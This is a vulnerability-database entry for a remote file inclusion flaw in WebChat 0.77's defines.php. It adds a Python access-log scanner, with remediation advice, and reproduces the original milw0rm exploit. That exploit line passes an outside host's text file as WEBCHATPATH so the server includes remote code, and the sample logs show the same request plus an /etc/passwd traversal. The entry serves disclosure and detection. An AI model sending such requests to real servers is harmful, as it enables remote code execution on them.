WebChat 'defines.php' PHP Remote File Inclusion Vulnerability

Vulnerability ID: 1112055    Vulnerability type: Unknown
Published: 2007-01-21    Updated: 2007-01-25
CVE ID: CVE-2007-0485    CNNVD ID: CNNVD-200701-417
Platform: PHP    CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/3169
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-417
|Vulnerability details
A PHP remote file inclusion vulnerability exists in defines.php in WebChat 0.77. A remote attacker can execute arbitrary PHP code by supplying a URL in the WEBCHATPATH parameter.
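Added detection example, not part of the CNNVD record or of the exploit text reproduced further down: a Python scanner that reads Apache combined-format access-log lines and flags request parameters whose value is a URL or PHP stream wrapper, which is the remote-inclusion pattern described above (including a trailing "?" on the supplied URL, which turns whatever suffix the script concatenates onto the path into a query string on the remote host). It also flags directory-traversal values, so it goes slightly beyond the remote case in the record. All log lines, hosts and addresses are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines in Apache combined log format. Hosts, paths and
# addresses are made up for this example (RFC 5737 documentation ranges).
SAMPLE_LOG = """\
203.0.113.5 - - [21/Jan/2007:10:12:01 +0000] "GET /webchat/defines.php?WEBCHATPATH=http://198.51.100.9/viper.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.6 - - [21/Jan/2007:10:12:05 +0000] "GET /webchat/defines.php?WEBCHATPATH=http%3A%2F%2F198.51.100.9%2Fx.txt%3F HTTP/1.1" 200 512 "-" "curl/7.19"
198.51.100.20 - - [21/Jan/2007:10:13:00 +0000] "GET /webchat/frame.php?room=lobby HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.21 - - [21/Jan/2007:10:14:00 +0000] "GET /webchat/defines.php?WEBCHATPATH=../../../../etc/passwd%00 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client address, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Schemes and stream wrappers that turn an include() into a fetch from somewhere else.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://", "php://", "data:")


def classify_value(value):
    """Return 'remote_include', 'local_traversal', or None for one query-string value."""
    v = unquote(value).strip().lower()  # a second decode catches double-encoded input
    if v.startswith(REMOTE_SCHEMES):
        return "remote_include"
    if "../" in v or "..\\" in v or "\x00" in v:
        return "local_traversal"
    return None


def scan_log(text):
    """Return one finding per suspicious query parameter seen in the log text."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line; skip rather than guess
        target = urlsplit(m.group("target"))
        # parse_qsl percent-decodes values; keep_blank_values so "p=" is still examined
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            kind = classify_value(value)
            if kind is None:
                continue
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "path": target.path,
                "param": name,
                "value": unquote(value),
                "kind": kind,
                "status": int(m.group("status")),
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['kind']:16} "
              f"{f['path']}?{f['param']}={f['value']!r} -> HTTP {f['status']}")
```

To run it over a real log, pass the file contents to scan_log(); a 200 status on a flagged request is the case worth triaging first, since it means the script served the request rather than rejecting it. Detection is the secondary control: the fix belongs in the application and PHP configuration, by deriving the include path from a fixed constant instead of a variable that can be populated from the request (via register_globals or an explicit assignment), and by keeping allow_url_include and allow_url_fopen disabled so that include() cannot retrieve code from a remote host at all.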
|Vulnerability EXP
######################################################################### 
# 
#           [ webchat ] 
# 
# Class:     File Include Vulnerability  
# Published  2007/1/21 
# Remote:    Yes  
# Critical   Level : Dangerous 
# Site:      http://www.easy-script.com/compt.php?id=1705  || http://sourceforge.net/projects/webdev-webchat/
# Author:    TheViper-hacker  
# Contact:   theviper-hacker@hotmail.com 
#   
#########################################################################
file ;
frame.php
======================================================
Vuln Code
include ($WEBCHATPATH.'language/english.php');
=======================================================
Exploit :       
Http:// www.Victem.0 / [ webchat-077_path] /defines.php?WEBCHATPATH=http://turnkringonzehoop.be/viper.txt?
 
 ----  Thanx: [MoHaNdKo] [Cold ThreE] [cold zero] [The Wolf KSA]  ]organza[
 ---- GreeTz: All www.4azhar.Com Members Cont : rida-10@msn.com
--------------------------------------||  Viva ISLAM ||-----------------------------------------

# milw0rm.com [2007-01-21]
|References

Source: XF
Name: webchat-definesphp-file-include(31624)
Link: http://xforce.iss.net/xforce/xfdb/31624
Source: MILW0RM
Name: 3169
Link: http://www.milw0rm.com/exploits/3169
Source: SECTRACK
Name: 1006193
Link: http://www.securitytracker.com/id?1006193
Source: BID
Name: 7000
Link: http://www.securityfocus.com/bid/7000
Source: BUGTRAQ
Name: 20030303WebChat(PHP)
Link: http://www.securityfocus.com/archive/1/archive/1/313610/30/25700/threaded
Source: SECUNIA
Name: 8206
Link: http://secunia.com/advisories/8206
Source: MILW0RM
Name: 3169
Link: http://milw0rm.com/exploits/3169